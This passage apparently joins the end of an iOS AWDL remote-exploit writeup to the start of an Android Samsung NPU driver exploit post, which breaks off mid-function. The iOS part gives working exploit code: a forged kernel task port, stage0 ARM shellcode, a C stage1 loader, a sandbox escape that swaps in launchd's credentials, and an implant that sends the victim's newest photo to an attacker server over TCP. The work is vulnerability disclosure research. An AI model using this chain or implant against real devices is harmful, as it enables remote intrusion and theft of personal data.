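struct ptov_entry { uint64_t pa; uint64_t kva; uint64_t len; };

uint64_t phys_to_physmap(struct ptov_entry* table, size_t n, uint64_t pa) {
  for (size_t i = 0; i < n; i++) {
    if (pa >= table[i].pa && pa < table[i].pa + table[i].len)
      return table[i].kva + (pa - table[i].pa);
  }
  return 0; // not covered; the kernelcache range is handled separately
}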


The interesting thing is that the virtual protection of the pages in the physmap doesn't have to match the virtual protection of the same pages as seen by a page table traversal from the perspective of a task. I wrote some test code using oob_timestamp to overwrite a portion of its own __TEXT segment via the physmap and it worked, allowing me to execute new native instructions. Could we execute userspace shellcode remotely by writing directly into the physmap?

What happened to my physmap?

This works fine when prototyped using oob_timestamp modifying itself; but if you try to use it to target a system process, it panics. Something else is going on.

APRR, PPL and pmap_cs.

The canonical resource for APRR is s1guza's blog post. It's a hardware customization by Apple to add an extra layer of indirection to page protection lookups via a control register. The page-tables alone are no longer enough to determine the runtime memory protection of a page.


APRR is used in the Safari JIT hardening and in the kernel it's used to implement PPL (Page Protection Layer). For an in-depth look at PPL check out Brandon Azad's recent blog post.


PPL uses APRR to dynamically switch the page protections of two kernel regions, a text region containing code and a data region. Normally the PPL text region is not executable and the PPL data region is not writable. Important data structures have been moved into this PPL data region, including page tables and pmaps (the abstraction layer above page tables). All the code which modifies objects inside PPL data has been moved inside the PPL text segment.


But if the PPL text is non-executable, how can you run the code to modify the PPL data regions? And how can you make them writable?


The only way to execute the code inside the PPL text region is to go through a trampoline function which flips the APRR register bits to make the PPL text region executable and the PPL data region writable before jumping to the provided ppl_routine. Obviously great care has to be taken to ensure only code inside PPL text runs in this state.


Brandon likened this to a "kernel inside the kernel" which is a good way to look at it. Modifications to page tables and pmaps are now meant to only happen by the kernel making "PPL syscalls" to request the modifications, with the implementation of those PPL syscalls being inside the PPL text region. Check out Brandon's blog post for discussion of how to exploit a vulnerability in the PPL code to make those changes anyway!


It turns out that it's not just page tables and pmaps which PPL protects. Reversing more of the PPL routines, there's a section of them starting around routine 38 which implements a new model of codesigning enforcement called pmap_cs.


Indeed, this pmap_cs string appears in the released XNU source, though attempts have been made to strip as much of the PPL related code as possible from the open source release. The vm_map_entry structure has this new field:


  /* boolean_t */ pmap_cs_associated:1, /* pmap_cs will validate */


From this code snippet from vm_fault.c it's pretty clear that pmap_cs is a new way to verify code signatures:


#if PMAP_CS

  if (fault_info->pmap_cs_associated &&

       pmap_cs_enforced(pmap) &&

       !m->vmp_cs_validated &&

       !m->vmp_cs_tainted &&

       !m->vmp_cs_nx &&

       (prot & VM_PROT_EXECUTE) &&

       (caller_prot & VM_PROT_EXECUTE)) {

         /*

          * With pmap_cs, the pmap layer will validate the

          * code signature for any executable pmap mapping.

          * No need for us to validate this page too:

          * in pmap_cs we trust...

          */

          vm_cs_defer_to_pmap_cs++;

  } else {

    vm_cs_defer_to_pmap_cs_not++;

    vm_page_validate_cs(m);

  }

#else /* PMAP_CS */

  vm_page_validate_cs(m);

#endif /* PMAP_CS */


vm_page_validate_cs is the old code-signing enforcement code, which can be easily tricked into allowing shellcode by changing the codesigning enforcement flags in the task's proc structure. The question is what determines whether the new pmap_cs model or the old approach is used?

A pmap_cs workaround

The fundamental question I'm trying to answer is why the physmap shellcode injection technique works for a test app I'm debugging, but not for a system process, even when the system process's code signing flags have been modified such that it should be allowed to run unsigned code.


We can see a reference to pmap_cs_enforced in the snippet above but the definition of this method is stripped from the released XNU source code. With IDA we can see it's checking the byte at offset +0x108 in the pmap structure. Nothing in the XNU code seems to manipulate this field though.


Reversing the pmap_cs PPL code we find that this field is referenced in pmap_cs_associate_internal_options, called by PPL routine 44.


This function has some helpful logging strings from which we can learn that it's being called to associate a code-signing structure with a virtual memory region. This code signing structure is a pmap_cs_code_directory, and we can determine from this panic log message:


if (trust_level != 3) {

  panic("\"trying to enter a binary in nested region with too low trust level %d\"", cd_entry->trust_level);

}


that the field at +0x54 represents the "trust level" of the binary.


Further down the function we can see this:


  if ( trust_level != 1 )

    goto LABEL_38;

  pmap->pmap_cs_enforced = 0;

   ...

  return KERN_NOT_SUPPORTED;


Probably my test apps signed by my developer certificate are getting this trust_level of 1 and therefore falling back to the old code-signing enforcement code. I had a hunch that maybe this also applied to third-party applications from the App Store; rather than painstakingly continuing to reverse engineer pmap_cs I just tried installing and running an App Store app (in this case, YouTube) on the phone then using oob_timestamp to dump the pmap structures for each running process. Indeed, there were three pmaps with pmap_cs_enforced set to 0: kernel_task (not so interesting because KTRR protects the kernel TEXT segment), oob_timestamp and YouTube!


This means that we can use the remote kernel read/write to inject shellcode into any third-party app running on the device. Of course, we don't want the prerequisite that the target needs to be running a third-party application, so we can reuse the technique developed earlier to open the calculator, this time to spawn a third-party app instead. If the device doesn't have any third-party applications installed this technique wouldn't work, but we already have kernel memory read/write so there are many more avenues available for running code in some form on the device. But for now, we'll assume the target device has at least one App Store app installed.

Uploading payloads

Our arbitrary write is reasonably fast but still too slow for us to use it to write an entire payload into the physmap that way. Instead, let's create a staged loader.


We will try to write a minimal piece of initial shellcode via the physmap which will be run as the fake signal handler. Its only purpose will be to bootstrap a larger payload and jump to it. The idea will be to place fragments of our final payload in kernel memory which the bootstrap code will find, copy into userspace, make executable and jump to.

A useful memory leak

Earlier I discussed the service_response technique for building a heap groom. I noted that this was an almost perfect heap grooming primitive: we control the size of the allocations and can place arbitrary bytes at arbitrary offsets within them. I also noted that it seemed to be a true memory leak as even when the AWDL interface is disabled, the memory never gets freed.


This also seems like a great primitive for staging our payload. All we need to do is figure out the address of the leaked memory.


The parser for the service response TLV (type 2) which causes the memory leak wraps the kalloc'ed buffer in an IO80211ServiceRequestDescriptor object. The pointer to the buffer is at offset +0x40 in there.


The IO80211ServiceRequestDescriptor is then enqueued into an IO80211CommandQueue in the IO80211AWDLPeerManager at +0x2968 which I've called response_fragments:


  peer_manager->response_fragments->lockEnqueue(response)


The lockEnqueue method calls ::enqueue which will add the new element at the head of the queue's linked list if either of the two following checks pass:


if ( this->max_elems_per_bucket == 0x1000000 || 

     this->max_elems_per_bucket * this->num_buckets > this->count )


If these checks fail the enqueue method returns an error, but the processServiceResponseTLV method never checks this error. The reason we get a true memory leak here is because the peer_manager's response_fragments queue is created with max_elems_per_bucket set to 8, meaning that after 8 incomplete fragments have arrived no more will be enqueued. The service response code doesn't handle this case and the return value of lockEnqueue isn't checked. The code no longer has a pointer to the RequestDescriptor and it cannot be freed. This is in some ways convenient for the heap groom, but not at all convenient when we want to know the address of the allocation!

Fixing the memory leak, sort of...

Using the arbitrary write we can increase the queue limit to a much higher value, and now our code works: with just a few frames we can place controlled buffers of up to around 1000 bytes in kernel memory and find their addresses by parsing the queue structure. Here's the wrapper function for this functionality in the exploit:


uint16_t kmem_leak_peer_id = 0;

 

uint64_t

copy_buffer_to_kmem(void* buf,

                    size_t len,

                    uint16_t kalloc_size,

                    uint16_t offset) {

  struct ether_addr kmem_leak_peer = 

    *(ether_aton("22:99:33:71:00:00"));

 

  *(((uint16_t*)&kmem_leak_peer)+2) = kmem_leak_peer_id++;

 

  inject(RT(),

      WIFI(kl_parm.dst, kmem_leak_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      SERV_RESP_KALLOCER(buf, len, kalloc_size, offset),

      HT_CAPS(),

      DATAPATH(kmem_leak_peer),

      PKT_END());

 

  uint64_t serv_resp_q = rk64(kl_parm.peer_manager_kaddr+0x2968);

  uint64_t buckets = rk64(serv_resp_q+0x48);

  uint64_t elem = rk64(buckets+0x8);

  uint64_t ptr = rk64(elem+0x40);

 

  return ptr;

}

Giving shellcode kernel memory read/write

We're going to want our payload to be able to read and write kernel memory just like we already can remotely. The canonical way to do this is to give the code a send right to a task port representing the kernel task. There are some new mitigations around this in iOS 13 (and more in iOS 14) but they're easily worked around because we already have kernel read/write using a different primitive.


We find the real kernel vm_map, build a fake kernel task port object and task, ensuring the correct kalloc_zone magic values are in the right place, then use the upload primitive to place them in kernel memory and find the addresses:


// build a fake kernel task:

uint64_t kern_proc = 0xFFFFFFF00941B818 + kaslr_slide;

uint64_t kern_task = rk64(kern_proc+0x10);

uint64_t kern_map  = rk64(kern_task+0x28);

 

uint32_t fake_task_buf_size = 0x200;

uint8_t* fake_task_buf = malloc(fake_task_buf_size);

memset(fake_task_buf, 0, fake_task_buf_size);

 

*(uint16_t*)(fake_task_buf+0x16) = 0x39;   // zone index for tasks

 

uint8_t* fake_task = fake_task_buf + 0x100;

*(uint64_t*)(fake_task+0x000) = 0;        // lck_mtx_data

*(uint8_t*) (fake_task+0x00b) = 0x22;     // lck_mtx_type

*(uint32_t*)(fake_task+0x010) = 4;        // ref_cnt

*(uint32_t*)(fake_task+0x014) = 1;        // active

*(uint64_t*)(fake_task+0x028) = kern_map; // map

 

uint64_t fake_task_buf_kaddr = copy_buffer_to_kmem(

                                 fake_task_buf,

                                 fake_task_buf_size,

                                 0x8001,

                                 0);

 

uint64_t fake_task_kaddr = fake_task_buf_kaddr + 0x100;

 

// build a fake kernel task port:

uint64_t target_task_port = rk64(target_task + 0x108);

uint64_t ipc_space_kernel = rk64(target_task_port + 0x60);

 

uint32_t fake_port_buf_size = 0x200;

uint8_t* fake_port_buf = malloc(fake_port_buf_size);

memset(fake_port_buf, 0, fake_port_buf_size);

 

*(uint16_t*)(fake_port_buf+0x16) = 0x2a; // zone index for ipc ports

  

uint8_t* fake_port = fake_port_buf + 0x100;

*(uint32_t*)(fake_port+0x000) = 0x80000000 | 2;   // ip_bits

*(uint32_t*)(fake_port+0x004) = 4;                // ip_references

*(uint64_t*)(fake_port+0x060) = ipc_space_kernel; // ip_receiver

*(uint64_t*)(fake_port+0x068) = fake_task_kaddr;  // ip_kobject

*(uint32_t*)(fake_port+0x09c) = 1;                // ip_mscount

*(uint32_t*)(fake_port+0x0a0) = 1;                // ip_srights

 

uint64_t fake_port_buf_kaddr = copy_buffer_to_kmem(

                                 fake_port_buf, 

                                 fake_port_buf_size,

                                 0x8001,

                                 0);

 

uint64_t fake_port_kaddr = fake_port_buf_kaddr + 0x100;


We then need the stage0 code to be able to use this fake port. Canonically you would set this port as host special port 4, which the shellcode could then retrieve like this:


  host_get_special_port(host_priv_self(),

                        HOST_LOCAL_NODE,

                        4,

                        &kernel_task);


The issue is this requires a send right to the host_priv port, which the app we're injecting the shellcode into won't have. Jailbreaks sometimes work around this by making the regular host port into the host_priv port, but we don't want to do that as it also weakens some sandboxing primitives.


One option would be to add the port into the task's port namespace directly but this is a little fiddly. Instead, I chose to use a task special port. These are per-task ports, pointers to which are stored in the task struct:


struct task {

   ...

  struct ipc_port *itk_host;      /* a send right */

  struct ipc_port *itk_bootstrap; /* a send right */

  struct ipc_port *itk_seatbelt;  /* a send right */

  struct ipc_port *itk_gssd;      /* yet another send right */

  struct ipc_port *itk_debug_control; /* send right for debugmode communications */

  struct ipc_port *itk_task_access; /* and another send right */

  struct ipc_port *itk_resume;    /* a receive right to resume this task */

  struct ipc_port *itk_registered[TASK_PORT_REGISTER_MAX];

...


I chose to use task special port 7 which is the now unused TASK_SEATBELT_PORT itk_seatbelt.


We use our remote kernel read/write to write the fake kernel task pointer there:


wk64(target_task+0x2e0, fake_port_kaddr);


Then the stage0 shellcode just has to do:


mach_port_t kernel_task = MACH_PORT_NULL;

task_get_special_port(mach_task_self(), 7, &kernel_task);


to get a send right to a functional kernel task port and gain local kernel memory read/write.

A shellcode framework: stage0

We're going to use the remote kernel memory read to find a victim process, traverse that victim process's page tables to find the physical address of a TEXT page (we'll use the first page of the binary). We'll then find the address of the mapping of that physical page in the physmap and use the remote kernel memory write to write a shellcode stub in there. We'll use the same fake-signal injection technique to force the victim process to jump to the start of our shellcode.


Since our remote kernel memory write is relatively slow (dozens of bytes a second) we don't want to inject our entire payload this way, instead we'll split it into multiple stages with stage0 being the only stage injected in this way. stage0's only purpose is to bootstrap a second, larger stage1. Here's the assembly of stage0:


.section __TEXT,__text

  ; save sigreturn context:

  mov x20, x4

 

  ; save sigreturn token:

  mov x21, x5

 

  ; retrieve tfp0

  sub sp, sp, #0x10

  ldr w0, task_self_name

  mov w1, #7 ; TASK_SEATBELT_PORT

  mov x2, sp

  ldr x8, task_get_special_port

  blr x8

  ldr w19, [sp] ; tfp0!

 

  ; read stage1 into userspace

  mov w0, w19

  ldr x1, stage1_kaddr

  ldr w2, stage1_size

  mov x3, sp

  add x4, sp, #0x08

  ldr x8, mach_vm_read

  blr x8

 

  ; write stage1 into physmap

  mov w0, w19

  ldr x1, stage1_physmap_kaddr

  ldp x2, x3, [sp]

  ldr x8, mach_vm_write

  blr x8

  

  ldr x0, stage1_uaddr

  mov w1, #0x4000

  ldr x8, sys_icache_invalidate

  blr x8 

  

  ; jump to stage1

  mov w0, w19 ; tfp0

  mov x1, x20 ; sigreturn context

  mov x2, x21 ; sigreturn token

 

  ldr x8, stage1_uaddr

  blr x8

 

task_self_name:

.word 0x49494949   

stage1_size:

.word 0x43434343

stage1_kaddr:

.quad 0x4141414141414141

mach_vm_read:

.quad 0x4242424242424242

stage1_physmap_kaddr:

.quad 0x4646464646464646

mach_vm_write:

.quad 0x4747474747474747

task_get_special_port:

.quad 0x4848484848484848

sys_icache_invalidate:

.quad 0x4b4b4b4b4b4b4b4b

stage1_uaddr:

.quad 0x4a4a4a4a4a4a4a4a


This could probably be smaller but will do for a demo.


At the bottom are constants; they'll get replaced by the exploit code just before they get written into the physmap. The exploit knows the userspace ASLR shift so it is able to replace them with the correct runtime symbol values.


The shellcode retrieves the send right to the fake kernel task port we placed as task special port 7, then uses it to read stage1 and immediately write it into the physmap. The last thing it does is invalidate the instruction cache by calling sys_icache_invalidate, then it jumps to stage1:

Stage1

Writing assembly is fun, for a bit. We really want to run code written in C as soon as possible. With a bit of care it is possible to write shellcode in C. To make things as simple as possible for the loader we will have no external linkage (you can't directly call any library functions) and no global variables. We want a binary where we can extract the text and cstring sections, jump to the start of the text and it will run.


We do of course want to be able to call library functions which can be done with some macro hackery:


#define F(name, ...) \

   ((typeof(name)*)(_dlsym(RTLD_DEFAULT, #name)))(__VA_ARGS__)


This allows us to call arbitrary functions using a cstring of their name via dlsym, with the correct prototype. For example, varargs functions will still work:


F(printf, "%s %d hello\n", foo, 123);


For this we will need one global variable; we don't want a data segment so we force it to be in __TEXT,__text:


#define FSYM(name) \

  typeof(name)* _##name __attribute__ ((section("__TEXT,__text"))) = (void*)(0x4141414141414141);

 

FSYM(dlsym);


This symbol will again be resolved by the exploit and replaced before stage1 is uploaded.


We define one more symbol, kdata, which we set to point to a configuration structure we also upload into the kernel heap somewhere. This configuration structure tells stage1 where to find the chunks which make up stage2 so it can be rebuilt:


struct kconf {

  uint64_t kaslr_slide;

  uint32_t kbuf_size;

  uint32_t n_text_fragments;

  uint64_t text_fragments[100];

};


Here's stage1:


void

start(mach_port_t tfp0,

      void* sigreturn_context,

      void* sigreturn_token) {

  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, "hello from stage1!");

 

  // read kconf from data:

  struct kconf kc;

  mach_vm_size_t out_size;

  F(mach_vm_read_overwrite,

      tfp0,

      kdata,

      sizeof(struct kconf),

      (mach_vm_address_t)(&kc),

      (mach_vm_size_t*)(&out_size));

        

  // compute the total size of stage2:

  uint32_t total_size = kc.n_text_fragments*1024;

 

  // roundup:

  total_size += 0x3fff;

  total_size &= (~0x3fff);

 

  // allocate a buffer for stage2:

  mach_vm_address_t base;

  mach_port_t self = F(task_self_trap);

  F(mach_vm_allocate,

      self,

      &base,

      total_size,

      VM_FLAGS_ANYWHERE);

 

  // read each fragment into the right place

  for (uint32_t i = 0; i < kc.n_text_fragments; i++) {

    F(mach_vm_read_overwrite,

        tfp0,

        kc.text_fragments[i],

        1024,

        base+(i*1024),

        &out_size);

  }

 

  // link _dlsym:

  uint64_t needle = 0x4141414141414141;

  volatile uint64_t* stage2_dlsym_addr = F(memmem,

                                             base,

                                             total_size,

                                             &needle,

                                             8);

 

  *stage2_dlsym_addr = _dlsym;

 

  // set the protection:

  F(mach_vm_protect,

      self,

      base,

      total_size,

      0,

      VM_PROT_READ | VM_PROT_EXECUTE);

 

    // jump to stage2:

  void (*stage2)(mach_port_t, void*) = (void*)base;

  stage2(tfp0, kdata);

}


We have a bit more leeway with the size of stage1; it can be up to around 1000 bytes.


It reads the configuration structure from the kernel, allocates memory for the final payload, reads each chunk into the right place, sets the page protection accordingly, and jumps to the final payload.

Escaping the sandbox from the outside

We've now removed any size restrictions on our payload, so we are free to write more complex code. The first step is to unsandbox the process we've ended up in. We can do this by replacing our credential structure with that of a more privileged process:


uint64_t kaslr_slide = r64(tfp0, kc+offsetof(struct kconf, kaslr_slide));

pid_t our_pid = F(getpid);
pid_t launchd_pid = 1;

uint64_t our_proc = 0;
uint64_t launchd_proc = 0;

// allproc
uint64_t proc = r64(tfp0, 0xFFFFFFF00941C940+kaslr_slide);

for (int i = 0; i < 1024; i++) {
  pid_t pid = r32(tfp0, proc+0x68);
  if (pid == our_pid) {
    our_proc = proc;
  }
  if (pid == launchd_pid) {
    launchd_proc = proc;
  }

  if (launchd_proc && our_proc) {
    break;
  }

  proc = r64(tfp0, proc+0);
}

// get launchd's ucreds:
uint64_t launchd_ucred = r64(tfp0, launchd_proc+0x100); // p_ucred

// use them to unsandbox ourselves:
w64(tfp0, our_proc+0x100, launchd_ucred);


We're still bound by the global platform_profile sandbox but this is enough to grant access to almost all user data.
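
The r64(), r32() and w64() helpers used above aren't shown in the post; they're presumably thin wrappers over the task-port VM APIs. A minimal sketch of plausible implementations (written in plain C rather than the F()-macro shellcode style, error handling omitted):

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <stdint.h>

// Read a 64-bit value from kernel memory via the (fake) kernel task port.
uint64_t r64(mach_port_t tfp0, uint64_t addr) {
  uint64_t val = 0;
  mach_vm_size_t out = 0;
  mach_vm_read_overwrite(tfp0, addr, sizeof(val), (mach_vm_address_t)&val, &out);
  return val;
}

// Read a 32-bit value.
uint32_t r32(mach_port_t tfp0, uint64_t addr) {
  uint32_t val = 0;
  mach_vm_size_t out = 0;
  mach_vm_read_overwrite(tfp0, addr, sizeof(val), (mach_vm_address_t)&val, &out);
  return val;
}

// Write a 64-bit value into kernel memory.
void w64(mach_port_t tfp0, uint64_t addr, uint64_t val) {
  mach_vm_write(tfp0, addr, (vm_offset_t)&val, sizeof(val));
}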

A minimal implant

At this point we basically have unfettered access to user data; we can read emails, private messages, photos, contacts, stream the camera and audio live, and so on. I don't want to spend another month writing a fully-featured implant, though, so I decided to just steal the most recently taken photo:


Reading some mobile forensics websites we can see that iOS stores photos taken by the camera in /private/var/mobile/Media/DCIM/100APPLE.


We can use the unix readdir API to enumerate that directory and find the most recently created file with the extension .HEIC:


#define timespec_cmp(a, b, CMP)     \
( ((a)->tv_sec == (b)->tv_sec) ?    \
  ((a)->tv_nsec CMP (b)->tv_nsec) : \
  ((a)->tv_sec CMP (b)->tv_sec))

struct dirent* ep;
while ((ep = F(readdir, dp))) {
  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, ep->d_name);
  if (!F(strstr, ep->d_name, ".HEIC")) {
    // only interested in photos taken by the camera
    continue;
  }
  char* fullpath;
  F(asprintf, &fullpath, "%s/%s", dirpath, ep->d_name);
  struct stat st;
  F(stat, fullpath, &st);
  if (timespec_cmp(&st.st_birthtimespec, &newest_timespec, >)) {
    newest_photo_path = fullpath;
    newest_timespec = st.st_birthtimespec;
  } else {
    F(free, fullpath);
  }
}


Then we just create a TCP socket, connect to a server we control and write the contents of that file to the socket:


int sock = F(socket, PF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = PF_INET;
addr.sin_port = htons(1234);
addr.sin_addr.s_addr = F(inet_addr, "10.0.1.2");

int conn_err = F(connect, sock, &addr, sizeof(addr));
if (conn_err) {
  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, "connect failed");
  F(sleep, 1000);
}

size_t photo_size = 0;
char* photo_buf = load_file(newest_photo_path, &photo_size);

F(write, sock, photo_buf, photo_size);
F(close, sock);
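
load_file() isn't shown in the post; a minimal sketch of what it might look like in the same F()-macro style (hypothetical helper, error handling omitted):

static char* load_file(const char* path, size_t* size_out) {
  int fd = F(open, path, O_RDONLY);
  struct stat st = {0};
  F(fstat, fd, &st);             // get the file size
  char* buf = F(malloc, st.st_size);
  F(read, fd, buf, st.st_size);  // read the whole file into the buffer
  F(close, fd);
  *size_out = st.st_size;
  return buf;
}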

Process continuation

stage0 saved the sigreturn context and token, which can now be used to let this thread continue safely. A real implant could now continue running in a separate thread and perform the necessary cleanup in the kernel to ensure AWDL can be safely disabled and the implant can continue to run in the background. For us, this is where the journey ends.

End-to-end demo


This demo shows the attacker successfully exploiting a victim iPhone 11 Pro device located in a different room through a closed door. The victim is using the YouTube app. The attacker forces the AWDL interface to activate then successfully exploits the AWDL buffer overflow to gain access to the device and run an implant as root. The implant has full access to the user's personal data, including emails, photos, messages, keychain and so on. The attacker demonstrates this by stealing the most recently taken photo. Delivery of the implant takes around two minutes, but with more engineering investment there's no reason this prototype couldn't be optimized to deliver the implant in a handful of seconds.

Conclusion

My exploit is pretty rough around the edges. With some proper engineering and better hardware, once AWDL is enabled the entire exploit could run in a handful of seconds. There are likely also better techniques for getting AWDL enabled in the first place rather than the hash bruteforce. My goal was to build a compelling demo of what can be achieved by one person, with no special resources, and I hope I've achieved that.


There are further aspects I didn't cover in this post: AWDL can be remotely enabled on a locked device using the same attack, as long as it's been unlocked at least once after the phone is powered on. The vulnerability is also wormable; a device which has been successfully exploited could then itself be used to exploit further devices it comes into contact with.


The inevitable question is: what about the next silver bullet, memory tagging (MTE)? Won't it stop this from happening?


My answer would be that Pointer Authentication was also pitched as ending memory corruption exploitation. When push came to shove, to actually ship a legacy codebase like the iOS kernel with Pointer Authentication, the primitives built using it and inserted by the compiler had to be watered down to such an extent that any competent attacker should have been able to modify their exploits to work around them. Undoubtedly this would have forced some extra work, and probably some vulnerabilities were no longer as useful, but it's hard to quantify the true impact without knowing what vulnerabilities these attackers were also sitting on in preparation for exactly this eventuality. Pointer Authentication shouldn't have come as a shock to any exploit developer; it had been expected for years.


Similarly, the ARMv8.5 specification containing the definitions of the Memory Tagging instructions has been publicly available for the last two years; that's plenty of time for attackers to prepare with publicly available information. It's reasonable to expect that top-tier attacker groups also have insider or private information.


The implementation compromises required on the software side to ship memory tagging will be different from those required for Pointer Authentication, but they will be there. Many mitigations built with MTE will be probabilistic in nature; will that be enough? And what about all the code constructs which might lead to bypasses? Nobody is going to check and rewrite every raw pointer cast in their codebase. Will the team responsible for performance accept the overhead of requiring every freed allocation to be zeroed? What about all the custom allocators? What about shared memory? What about intra-struct buffer overflows (like this AWDL vulnerability)? What about JavaScript? What about logic bugs and speculative side channels?


We know nothing about what primitives Apple might build with memory tagging, but we do have some insight from Microsoft, who published a detailed analysis of the tradeoffs they are facing with their implementation. Sharing such information with the security community helps enormously in understanding those tradeoffs. Memory tagging will probably make some vulnerabilities unexploitable, just like Pointer Authentication probably did. But to quantify the true impact requires an estimate of the impact it has on the entire space of vulnerabilities, and it's in this estimate where the defensive and offensive communities differ. As things currently stand, there are probably just too many good vulnerabilities for any of these mitigations to pose much of a challenge to a motivated attacker. And, of course, mitigations only present in future hardware don't benefit the billions of devices already shipped and currently in use.


These mitigations do move the bar, but what do I think it would take to truly raise it?


Firstly, a long-term strategy and plan for how to modernize the enormous amount of critical legacy code that forms the core of iOS. Yes, I'm looking at you, vm_map.c, originally written in 1985 and still in use today! Let's not forget that PAC is still not available to third-party apps, so memory corruption in a third-party messaging app followed by a vm_map logic bug is still going to get an attacker everything they want for probably years after MTE first ships.


Secondly, a short-term strategy for how to improve the quality of new code being added at an ever-increasing rate. This comes down to more investment in modern best practices like broad, automated testing, code review for critical, security-sensitive code, and high-quality internal documentation so developers can understand where their code fits in the overall security model.


Thirdly, a renewed focus on vulnerability discovery using more than just fuzzing. This means not just more variant analysis, but a large, dedicated effort to understand how attackers really work and beat them at their own game by doing what they do better.


An iOS hacker tries Android

Written by Brandon Azad, when working at Project Zero

One of the amazing aspects of working at Project Zero is having the flexibility to direct my own research agenda. My prior work has almost exclusively focused on iOS exploitation, but back in August, I thought it could be interesting to try writing a kernel exploit for Android to see how it compares. I have two aims for this blog post: First, I will walk you through my full journey from bug description to kernel read/write/execute on the Samsung Galaxy S10, starting from the perspective of a pure-iOS security researcher. Second, I will try to emphasize some of the major security/exploitation differences between the two platforms that I have observed.

You can find the fully-commented exploit code attached in issue 2073.

In November 2020, Samsung released a patch addressing the issue for devices that are eligible for receiving security updates. This issue was assigned CVE-2020-28343 and a Samsung-specific SVE-2020-18610.

The initial vulnerability report

In early August, fellow Google Project Zero researcher Ben Hawkes reported several vulnerabilities in the Samsung Neural Processing Unit (NPU) kernel driver due to a complete lack of input sanitization. At a high level, the NPU is a coprocessor dedicated to machine learning and neural network computations, especially for visual processing. The bugs Ben found were in Samsung's Android kernel driver for the NPU, responsible (among other things) for sending neural models from an Android app in userspace over to the NPU coprocessor.

The following few sections will look at the vulnerabilities. These bugs aren't actually that interesting: they are quite ordinary out-of-bounds writes due to unsanitized input, and could almost be treated as black-box primitives for the purposes of writing an exploit (which was my ultimate goal). The primitives are quite strong and, to my knowledge, no novel techniques are required to build a practical exploit out of them. However, since I was coming from the perspective of never having written a Linux kernel exploit, understanding these bugs and their constraints in detail was crucial for me to begin to visualize how they might be used to gain kernel read/write.

🤖 📱 🧠 👓 🐛🐛

The vulnerabilities are reached by opening a handle to the device /dev/vertex10, which Ben had determined is accessible to a normal Android app. Calling open() on this device causes the kernel to allocate and initialize a new npu_session object that gets associated with the returned file descriptor. The process can then invoke ioctl() on the file descriptor to interact with the session. For example, consider the following code:

int ncp_fd = open("/dev/vertex10", O_RDONLY);
struct vs4l_graph vs4l_graph = /* ioctl data */;
ioctl(ncp_fd, VS4L_VERTEXIOC_S_GRAPH, &vs4l_graph);

The preceding syscalls will result in the kernel calling the function npu_vertex_s_graph(), which calls npu_session_s_graph() on the associated npu_session (see drivers/vision/npu/npu-vertex.c). npu_session_s_graph() then calls __config_session_info() to parse the input data to this ioctl (see npu-session.c):

int __config_session_info(struct npu_session *session)
{
...
    ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);
    temp_IFM_av = kcalloc(temp_IFM_cnt, sizeof(struct temp_av), GFP_KERNEL);
    temp_OFM_av = kcalloc(temp_OFM_cnt, sizeof(struct temp_av), GFP_KERNEL);
    temp_IMB_av = kcalloc(temp_IMB_cnt, sizeof(struct temp_av), GFP_KERNEL);
...
    ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);
...
}

As can be seen above, __config_session_info() calls two other functions to perform the actual parsing of the input: __pilot_parsing_ncp() and __second_parsing_ncp(). As their names suggest, __pilot_parsing_ncp() performs a preliminary "pilot" parsing of the input data in order to compute the sizes of a few arrays that will need to be allocated for the full parsing; meanwhile, __second_parsing_ncp() performs the full parsing, populating the arrays that were just allocated.

Let's take a quick look at __pilot_parsing_ncp():

int __pilot_parsing_ncp(struct npu_session *session, u32 *IFM_cnt, u32 *OFM_cnt, u32 *IMB_cnt, u32 *WGT_cnt)
{
...
    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
    ncp = (struct ncp_header *)ncp_vaddr;
    memory_vector_offset = ncp->memory_vector_offset;
    memory_vector_cnt = ncp->memory_vector_cnt;
    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
    for (i = 0; i < memory_vector_cnt; i++) {
        u32 memory_type = (mv + i)->type;
        switch (memory_type) {
        case MEMORY_TYPE_IN_FMAP:
            {
                (*IFM_cnt)++;
                break;
            }
        case MEMORY_TYPE_OT_FMAP:
            {
                (*OFM_cnt)++;
                break;
            }
...
        }
    }
    return ret;
}

There are a few things to note here.

First, the input data is being parsed from a buffer pointed to by the field session->ncp_mem_buf->vaddr. This turns out to be an ION buffer, which is a type of memory buffer shareable between userspace, the kernel, and coprocessors. The ION interface was introduced by Google into the Android kernel to facilitate allocating device-accessible memory and sharing that memory with various hardware components, all without needing to copy the data between buffers. In this case, the userspace app will initialize the model directly inside an ION buffer, and then the model will be mapped directly into the kernel for pre-processing before the ION buffer's device address is sent to the NPU to perform the actual work.

The important takeaway from this first observation is that the session->ncp_mem_buf->vaddr field points to an ION buffer that is currently mapped into both userspace and the kernel: that is, it's shared memory.

The second thing to note in the function __pilot_parsing_ncp() is that the only thing it does is count the number of times each type of element appears in the memory_vector array in the shared ION buffer. Each memory_vector element has an associated type, and this function simply tallies up the number of times it sees each type, and nothing else. There isn't even a failure case for this function.

This is interesting for a few reasons. For one, there's no input sanitization to ensure that memory_vector_cnt (which is read directly from the shared memory buffer and thus is attacker-controlled) is a sane value. It could be 0xffffffff, leading the for loop to process memory_vector elements off the end of the ION buffer. Probably a kernel crash at worst, but it's certainly an indication of unfuzzed code.

More importantly, since only the count of each type is stored, it seems likely that this code is setting itself up for a double-read, time-of-check-to-time-of-use (TOCTOU) issue when it later processes the memory_vectors a second time. Each of the returned counts is used to allocate an array in kernel memory (see __config_session_info()). But because the memory_vector_cnt and types reside in shared memory, they could be changed by code running in userspace between __pilot_parsing_ncp() and __second_parsing_ncp(), meaning that the second function is passed incorrectly sized arrays for the memory_vector data it eventually sees in the shared buffer.

Of course, to determine whether this is actually a bug, we have to look at the implementation of __second_parsing_ncp():

int __second_parsing_ncp(
    struct npu_session *session,
    struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
    struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
    ncp_daddr = session->ncp_mem_buf->daddr;
